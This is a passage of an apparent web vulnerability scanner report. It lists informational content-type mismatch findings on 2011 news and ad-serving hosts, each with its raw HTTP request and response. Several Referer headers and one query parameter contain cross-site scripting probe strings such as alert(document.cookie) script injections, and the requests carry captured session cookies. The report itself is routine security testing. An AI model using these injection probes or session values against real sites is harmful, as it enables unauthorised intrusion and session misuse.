Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

28.10. http://common.onset.freedom.com/fi/adsense/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://common.onset.freedom.com
Path:   /fi/adsense/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fi/adsense/?scode=wrgb&placement=section HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_footer/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n13), ht iad-agg-n13.panthercdn.com
Cache-Control: max-age=7200
Expires: Fri, 28 Jan 2011 17:59:54 GMT
Age: 5855
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 4922

function google_ad_request_done(google_ads) {

   if (google_ads.length == 0) return;
   var s = ''; var i;
   var reflink="https://adwords.google.com/select/OnsiteSignupLandingPage?client=ca-freedom_js&ref
...[SNIP]...

28.11. http://common.onset.freedom.com/fi/analytics/cms/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather&ghier=weather&us=anonymous HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:38:14 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n20 ( iad-agg-n28), ht-d iad-agg-n28.panthercdn.com
Cache-Control: max-age=7200
Expires: Sat, 29 Jan 2011 14:59:19 GMT
Age: 2336
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28654

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

28.12. http://event.adxpose.com/event.flow

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement: Content-Type: text/javascript;charset=UTF-8. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7984D788D573EFCDF0206C9A4486038; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Fri, 28 Jan 2011 15:00:16 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845");

28.13. http://events.cbs6albany.com/images/zbutton.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.cbs6albany.com
Path:   /images/zbutton.gif

Issue detail

The response contains the following Content-type statement: Content-Type: image/gif. The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zbutton.gif HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:24 GMT
Content-Type: image/gif
Content-Length: 635
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sat, 29 Jan 2011 17:37:24 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR..............W.?...2PLTE..............l..C........n.............................
........)..-..............D..............
..$.....;...........U.....7..B....................F..t..~...
...[SNIP]...

28.14. http://events.cbs6albany.com/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.cbs6albany.com
Path:   /json

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=5&p=150&sid=jblyxxj3qv HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; s_vnum=1298828234584%26vn%3D1; __qca=P0-387650238-1296236241942; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; s_cc=true; s_lastvisit=1296308278321; fi_dslv=Less%20than%201%20day; s_vnum_w=1296367200803%26vn%3D2; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D2; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:38:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 22
ETag: "6ada5d9026de97b7a69a76e9d5289da1"
X-Content-Digest: 1bf9b03ed1a98a41bde540df89f91f024aea5cd7
Cache-Control: max-age=1800, public
Age: 0
Content-Length: 16813

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Pink Floyd Experience","price":"$25.00 - $30.00","private":false,"editors_pick":false,"url":"http://www.palaceal
...[SNIP]...

28.15. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:44:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico not found</pre>
<BR>

28.16. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://main.oggifinogi.com
Path:   /OggiPlayerService/PlayerProxy.aspx

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=&getLoader=true HTTP/1.1
Host: main.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: True
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: application/x-javascript
Content-Length: 12072

OggiResponse='\1\1<html xmlns="http://www.w3.org/1999/xhtml">\1<head id="PlayerHead"><title>\1    Player\1</title>\1 <style type="text/css">\1 .hand {cursor:pointer}\1 </style>\1 <!--[if
...[SNIP]...

28.17. http://mig.nexac.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mig.nexac.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:28:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 13 Oct 2010 18:42:29 GMT
ETag: "241cbf-1cee-f49acf40"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 761
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...

28.19. http://oascentral.bostonherald.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oascentral.bostonherald.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:42:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 15:55:03 GMT
ETag: "7f095-1cee-734523c0"
Accept-Ranges: bytes
ntCoent-Length: 7406
Content-Type: text/plain
Cache-Control: private
Content-Length: 7406

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.20. http://onset.freedom.com/fi/analytics/cms/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:24 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Fri, 28 Jan 2011 19:37:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28783

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

28.21. http://raw.oggifinogi.com/Service.svc/OptOutCookiePresents

Summary

Severity:   Information
Confidence:   Firm
Host:   http://raw.oggifinogi.com
Path:   /Service.svc/OptOutCookiePresents

Issue detail

The response contains the following Content-type statement: Content-Type: application/json; charset=utf-8. The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /Service.svc/OptOutCookiePresents? HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://static-cdn-cf.oggifinogi.com/prod/RequestSender.swf?v=4&playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: application/json; charset=utf-8
Content-Length: 5

false

28.22. http://raw.oggifinogi.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://raw.oggifinogi.com
Path:   /crossdomain.xml

Issue detail

The response contains the following Content-type statement: Content-Type: text/xml. The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /crossdomain.xml HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://static-cdn-cf.oggifinogi.com/prod/RequestSender.swf?v=4&playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 257
Content-Type: text/xml
Last-Modified: Fri, 12 Sep 2008 13:12:44 GMT
Accept-Ranges: bytes
ETag: "2ae33c3ed914c91:6ac"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 21:58:03 GMT

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<allow-http-request-head
...[SNIP]...

28.23. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/game.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/game.aspx?team=028 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=58
Expires: Fri, 28 Jan 2011 22:01:00 GMT
Last-Modified: Fri, 28 Jan 2011 22:00:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 3133

document.write('<TABLE border="0" cellspacing="1" cellpadding="2" width="100%"><TR><TH Class="TSN6" width="40%" align="left">Final</TH><TH Class="TSN2" align="center" width="5%">1</TH><TH Class="TSN2"
...[SNIP]...

28.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nbagame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nbagame.aspx?team=092 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1245

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><TR><TH width="40%" class="TSN6" align="left">1/28 10:30 PM ET</th><TH width="10%" class="TSN2" align="center">1</th><TH
...[SNIP]...

28.25. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nflgame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nflgame.aspx?team=077 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1814

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

28.26. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nhlgame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

